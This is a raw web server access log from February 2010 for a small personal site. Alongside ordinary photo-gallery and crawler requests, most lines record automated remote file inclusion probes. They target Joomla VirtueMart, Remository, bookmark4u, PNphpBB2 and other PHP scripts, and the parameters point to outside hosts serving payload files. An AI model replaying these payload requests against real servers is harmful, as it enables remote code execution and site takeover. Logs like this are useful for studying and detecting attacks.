78.188.102.171 - - [11/Feb/2010:05:59:07 -0800] "GET /pictures/p11/r_2MP.gif HTTP/1.1" 200 814 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:59:07 -0800] "GET /pictures/p11/r_VGA.gif HTTP/1.1" 200 786 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:59:07 -0800] "GET /pictures/p11/r_5MP.gif HTTP/1.1" 200 820 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:59:07 -0800] "GET /pictures/p11/r_3MP.gif HTTP/1.1" 200 818 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
62.140.23.24 - - [11/Feb/2010:05:59:24 -0800] "GET /logs/access_100114.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:05:59:24 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:05:59:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [11/Feb/2010:05:59:34 -0800] "GET /pictures/p11/DSC00585.jpg HTTP/1.1" 200 189523 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:06:00:03 -0800] "GET /pictures/p11/index.php HTTP/1.1" 200 34466 "http://puaga.com/login/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
74.50.85.229 - - [11/Feb/2010:06:00:03 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:04 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:14 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:17 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:17 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:20 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:25 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [11/Feb/2010:06:00:28 -0800] "GET /pictures/p11/DSC00586.jpg HTTP/1.1" 200 2228224 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:06:00:28 -0800] "GET /pictures/p11/index.php HTTP/1.0" 200 34450 "http://puaga.com/login/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:34 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [11/Feb/2010:06:00:36 -0800] "GET /pictures/p11/DSC00584.jpg HTTP/1.1" 200 196121 "http://puaga.com/pictures/p11/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:41 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:00:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:01:01 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:01:02 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:01:21 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:01:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:01:32 -0800] "GET /logs/access_100114.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:01:32 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:01:57 -0800] "GET /logs/access_100122.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:01:57 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:01:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:00 -0800] "GET /logs/access_100114.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:00 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:00 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:06:02:02 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:06:02:18 -0800] "GET /orange_g/forum/viewtopic.php?p=27637 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:34 -0800] "GET /logs/access_100119.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:45 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:52 -0800] "GET /logs/access_100114.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:52 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:02:52 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:06:03:22 -0800] "GET /logs/access_100126.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:06:03:22 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:06:03:23 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:03:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:03:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:03:30 -0800] "GET /logs/access_100122.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:03:42 -0800] "GET /logs/access_100119.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:06:03:56 -0800] "GET /logs/access_100126.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:06:03:56 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:06:03:57 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:04:20 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [11/Feb/2010:06:04:31 -0800] "GET /simplepack/grader/archive/SimpleGrader1.0.0SetupWin32.exe HTTP/1.0" 200 1422937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.93.147.154 - - [11/Feb/2010:06:06:33 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:06:33 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:06:33 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:07:34 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:08:27 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:09:06 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:09:15 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:09:15 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:09:17 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:10:17 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:10:17 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:10:17 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:10:34 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.115.6.13 - - [11/Feb/2010:06:11:18 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:11:42 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.111.51 - - [11/Feb/2010:06:11:52 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "taptubot *** please read http://www.taptu.com/corp/taptubot ***" "pixero.net"
174.129.111.51 - - [11/Feb/2010:06:11:54 -0800] "GET / HTTP/1.0" 200 2376 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "pixero.net"
174.129.111.51 - - [11/Feb/2010:06:11:55 -0800] "GET /apple-touch-icon.png HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "pixero.net"
174.129.111.51 - - [11/Feb/2010:06:12:22 -0800] "GET / HTTP/1.0" 200 2376 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.pixero.net"
125.160.17.201 - - [11/Feb/2010:06:12:29 -0800] "GET /logs/index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:06:12:30 -0800] "GET /index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.129.111.51 - - [11/Feb/2010:06:12:46 -0800] "GET /iphone/ HTTP/1.0" 200 1805 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.pixero.net"
125.160.17.201 - - [11/Feb/2010:06:13:13 -0800] "GET /logs/access_100125.log%20%20/index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.111.51 - - [11/Feb/2010:06:13:14 -0800] "GET /mobile/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.pixero.net"
174.129.111.51 - - [11/Feb/2010:06:13:16 -0800] "GET /m/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.pixero.net"
174.129.111.51 - - [11/Feb/2010:06:13:16 -0800] "GET /mobi/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.pixero.net"
174.129.111.51 - - [11/Feb/2010:06:13:18 -0800] "GET / HTTP/1.0" 200 2376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "pixero.net"
221.143.40.35 - - [11/Feb/2010:06:14:53 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [11/Feb/2010:06:14:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [11/Feb/2010:06:14:54 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:06:15:10 -0800] "GET /include/prodler.class.php?sPath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:06:15:10 -0800] "GET /logs/include/prodler.class.php?sPath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:06:15:10 -0800] "GET /logs/access_100119.log%20%20/include/prodler.class.php?sPath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:06:15:13 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:06:15:14 -0800] "GET /orange_g/forum/viewtopic.php?p=27434 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
212.193.10.130 - - [11/Feb/2010:06:15:38 -0800] "GET /logs/access_100123.log%20%20/include/prodler.class.php?sPath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:16:14 -0800] "GET /logs/access_100105.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:16:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:16:18 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:16:18 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:16:48 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:16:57 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:16:58 -0800] "GET /logs/access_100105.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:16:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:16:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:17:29 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:17:36 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:17:36 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:17:36 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:22 -0800] "GET /logs/access_100111.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:22 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:22 -0800] "GET /logs/access_100111.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:23 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:18:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:06:18:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
